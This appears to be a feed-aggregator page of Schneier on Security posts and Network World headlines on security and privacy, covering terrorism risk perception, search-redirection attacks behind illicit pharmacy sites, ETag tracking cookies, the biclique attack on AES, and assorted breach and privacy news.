    Cognitive psychologists such as Amos Tversky, Daniel Kahneman, Gerd Gigerenzer, and Paul Slovic have shown that the perceived danger of a risk depends on two factors: fathomability and dread. People are terrified of risks that are novel, undetectable, delayed in their effects, and poorly understood. And they are terrified about worst-case scenarios, the ones that are uncontrollable, catastrophic, involuntary, and inequitable (that is, the people exposed to the risk are not the ones who benefit from it).

    These psychologists suggest that cognitive illusions are a legacy of ancient brain circuitry that evolved to protect us against natural risks such as predators, poisons, storms, and especially enemies. Large-scale terrorist plots are novel, undetectable, catastrophic, and inequitable, and thus maximize both unfathomability and dread. They give the terrorists a large psychological payoff for a small investment in damage.

    [...]

    Audrey Cronin nicely captures the conflicting moral psychology that defines the arc of terrorist movements: "Violence has an international language, but so does decency."

    Channel Image06:00 Security by Default» Schneier on Security

    Nice essay by Christopher Soghoian on why cell phone and Internet providers need to enable security options by default.

    Channel Image06:00 Search Redirection and the Illicit Online Prescription Drug Trade» Schneier on Security

    Really interesting research.

    Search-redirection attacks combine several well-worn tactics from black-hat SEO and web security. First, an attacker identifies high-visibility websites (e.g., at universities) that are vulnerable to code-injection attacks. The attacker injects code onto the server that intercepts all incoming HTTP requests to the compromised page and responds differently based on the type of request: Requests from search-engine crawlers return a mix of the original content, along with links to websites promoted by the attacker and text that makes the website appealing to drug-related queries.
    • Requests from users arriving from search engines are checked for drug terms in the original search query. If a drug name is found in the search term, then the compromised server redirects the user to a pharmacy or another intermediary, which then redirects the user to a pharmacy.

    • All other requests, including typing the link directly into a browser, return the infected website's original content.

    • The net effect is that web users are seamlessly delivered to illicit pharmacies via infected web servers, and the compromise is kept hidden from view of the affected host's webmaster in nearly all circumstances.

    Upon inspecting search results, we identified 7,000 websites that had been compromised in this manner between April 2010 and February 2011. One quarter of the top ten search results were observed to actively redirect to pharmacies, and another 15% of the top results were for sites that no longer redirected but had previously been compromised. We also found that legitimate health resources, including authorized pharmacies, were largely crowded out of the top results by search-redirection attacks and blog and forum spam promoting fake pharmacies.

    And the paper.

    Channel Image06:00 New, Undeletable, Web Cookie» Schneier on Security

    A couple of weeks ago Wired reported the discovery of a new, undeletable, web cookie:

    Researchers at U.C. Berkeley have discovered that some of the net’s most popular sites are using a tracking service that can’t be evaded -- even when users block cookies, turn off storage in Flash, or use browsers’ “incognito” functions.

    The Wired article was very short on specifics, so I waited until one of the researchers -- Ashkan Soltani -- wrote up more details. He finally did, in a quite technical essay:

    What differentiates KISSmetrics apart from Hulu with regards to respawning is, in addition to Flash and HTML5 LocalStorage, KISSmetrics was exploiting the browser cache to store persistent identifiers via stored Javascript and ETags. ETags are tokens presented by a user’s browser to a remote webserver in order to determine whether a given resource (such as an image) has changed since the last time it was fetched. Rather than simply using it for version control, we found KISSmetrics returning ETag values that reliably matched the unique values in their 'km_ai' user cookies.
    Channel Image06:00 New Attack on AES» Schneier on Security

    "Biclique Cryptanalysis of the Full AES," by Andrey Bogdanov, Dmitry Khovratovich, and Christian Rechberger.

    Abstract. Since Rijndael was chosen as the Advanced Encryption Standard, improving upon 7-round attacks on the 128-bit key variant or upon 8-round attacks on the 192/256-bit key variants has been one of the most difficult challenges in the cryptanalysis of block ciphers for more than a decade. In this paper we present a novel technique of block cipher cryptanalysis with bicliques, which leads to the following results:
    • The first key recovery attack on the full AES-128 with computational complexity 2126.1.
    • The first key recovery attack on the full AES-192 with computational complexity 2189.7.
    • The first key recovery attack on the full AES-256 with computational complexity 2254.4.
    • Attacks with lower complexity on the reduced-round versions of AES not considered before, including an attack on 8-round AES-128 with complexity 2124.9.
    • Preimage attacks on compression functions based on the full AES versions.

    In contrast to most shortcut attacks on AES variants, we do not need to assume related-keys. Most of our attacks only need a very small part of the codebook and have small memory requirements, and are practically verified to a large extent. As our attacks are of high computational complexity, they do not threaten the practical use of AES in any way.

    This is what I wrote about AES in 2009. I still agree with my advice:

    Cryptography is all about safety margins. If you can break n round of a cipher, you design it with 2n or 3n rounds. What we're learning is that the safety margin of AES is much less than previously believed. And while there is no reason to scrap AES in favor of another algorithm, NST should increase the number of rounds of all three AES variants. At this point, I suggest AES-128 at 16 rounds, AES-192 at 20 rounds, and AES-256 at 28 rounds. Or maybe even more; we don't want to be revising the standard again and again.

    And for new applications I suggest that people don't use AES-256. AES-128 provides more than enough security margin for the forseeable future. But if you're already using AES-256, there's no reason to change.

    The advice about AES-256 was because of a 2009 attack, not this result.

    Again, I repeat the saying I've heard came from inside the NSA: "Attacks always get better; they never get worse."

    Channel Image06:00 Alarm Geese» Schneier on Security

    A prison in Brazil uses geese as part of its alarm system.

    There's a long tradition of this. Circa 400 BC, alarm geese alerted a Roman citadel to a Gaul attack.

    05:00 Univ. of Tampa says student info was exposed for 8 months» Network World on Privacy
    An in-class project on advanced search techniques led to the discovery of a major data breach at the University of Tampa in Florida last week.
    Channel Image05:00 The collar bomber's explosive tech gaffe» Network World on Security
    The man who claimed to have attached a bomb collar to an Australian high school student two weeks ago thought it would be a good idea to leave a ransom note on a USB stick looped around her neck. What he probably didn't realize is that he also left his name, hidden deep in the device's memory.
    05:00 SXSW: Location, location, location fuels mobile apps» Network World on Privacy
    Soon FourSquare won't be the only cool kid on the location-based apps block: A new wave of startups, including Highlight, Zaarly, TaskRabbit and Localmind, are generating buzz at South by Southwest by drawing on smartphone location data to deliver a range of social, commercial and informational experiences.
    05:00 Privacy regulators: US and EU will take different approaches» Network World on Privacy
    The development of online privacy protections is at a critical moment as policy makers in both the U.S. and European Union push for changes to their privacy rules, but coordination of enforcement across the Atlantic Ocean may be tricky, several privacy experts said Monday.
    Channel Image05:00 NSTIC director: 'We're trying to get rid of passwords'» Network World on Security
    The federal government's National Strategy for Trusted Identities in Cyberspace (NSTIC) program is trying to identify more secure alternatives to simple passwords that the government as well as anyone else might use in authenticating to online applications.
    05:00 Lawmakers want Apple to brief them on iOS app privacy» Network World on Privacy
    Two U.S. lawmakers on Wednesday asked Apple representatives to brief members of the House Energy and Commerce Committee on the company's mobile privacy policies, saying a letter from Apple did not answer all of their questions.
    05:00 Is Application Security the Glaring Hole in Your Defense?» Network World on Privacy
    Organizations on average spend one-tenth as much on application security as they do on network security, even though SQL injection attacks are the highest root cause of data breaches. Experts say educating developers in writing secure code is the answer.
    Channel Image05:00 Identity security in the cloud» Network World on Security
    There were a couple of announcements made at last month's Catalyst conference that I meant to draw to your attention but other things got in the way. Both are relevant to enterprise cloud-based computing so I'll talk about both today.
    05:00 Google says it will cooperate with any Safari privacy investigations» Network World on Privacy
    Google will cooperate with any investigations into allegations that it bypassed privacy settings in Apple's Safari browser, the company said, after a news report that both U.S. and E.U. officials are investigating the company.
    05:00 Google patents technology to serve ads based on background noise» Network World on Privacy
    A new Google patent could enable the search giant to base advertising on background noise during phone conversations, although the scope of the patent is much broader.
    Channel Image05:00 Google highlights trouble in detecting Web-based malware» Network World on Security
    Google issued a new study on Wednesday detailing how it is becoming more difficult to identify malicious websites and attacks, with antivirus software proving to be an ineffective defense against new ones.
    05:00 Facebook warns employers not to ask job applicants for log-in credentials» Network World on Privacy
    Facebook on Friday warned employers about trying to gain inappropriate access to Facebook accounts to check out private information about potential employees, citing possible legal liability.
    Channel Image05:00 Cracked SpyEye cheers, worries researchers» Network World on Security
    A hacking group has released a tool to remove the copy protection for a popular bot program, an event that is both good news and bad news for end users, a security researcher said Tuesday.
    Channel Image05:00 Chase.com goes down, but only for Firefox users» Network World on Security
    A year after a major outage on its banking website, Chase today experienced another problem: An outdated Firefox certificate left some users without access for 45 minutes.
    Channel Image05:00 Can the Obama Administration fix your identity management problems?» Network World on Security
    Can the Obama administration fix your identity management problems?
    Channel Image05:00 Anonymous claims release of BART police officers' data» Network World on Security
    Hackers claiming to belong to the collective Anonymous this morning publicly posted the names, home addresses, email addresses and passwords of 102 police officers belonging to San Francisco's Bay Area Rapid Transit (BART) agency
    05:00 Ads in mobile apps aren't just annoying -- they're risky, too» Network World on Privacy
    Many mobile apps include ads that can threaten users' privacy and network security, according to North Carolina State University researchers.
    Channel Image05:00 AES proved vulnerable by Microsoft researchers» Network World on Security
    Researchers from Microsoft and the Dutch Katholieke Universiteit Leuven have discovered a way to break the widely used Advanced Encryption Standard (AES), the encryption algorithm used to secure most all online transactions and wireless communications.
    Channel Image05:00 2011 State of the CSO» Network World on Security
    More budget? Perhaps a little. More attention from senior management? Yes, a bit. Better results? That's not so clear.
    05:00 18 firms sued for using privacy-invading mobile apps» Network World on Privacy
    Facebook, Apple, Twitter, Yelp and 14 other companies have been hit with a lawsuit accusing them of distributing privacy-invading mobile applications.